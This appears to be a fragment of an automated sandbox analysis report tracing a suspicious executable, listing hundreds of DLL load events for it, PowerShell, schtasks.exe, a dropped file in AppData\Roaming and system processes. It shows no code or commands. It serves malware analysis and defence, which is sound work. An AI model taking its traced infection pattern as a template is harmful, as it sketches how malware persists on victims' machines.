Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: thumbcache.dll
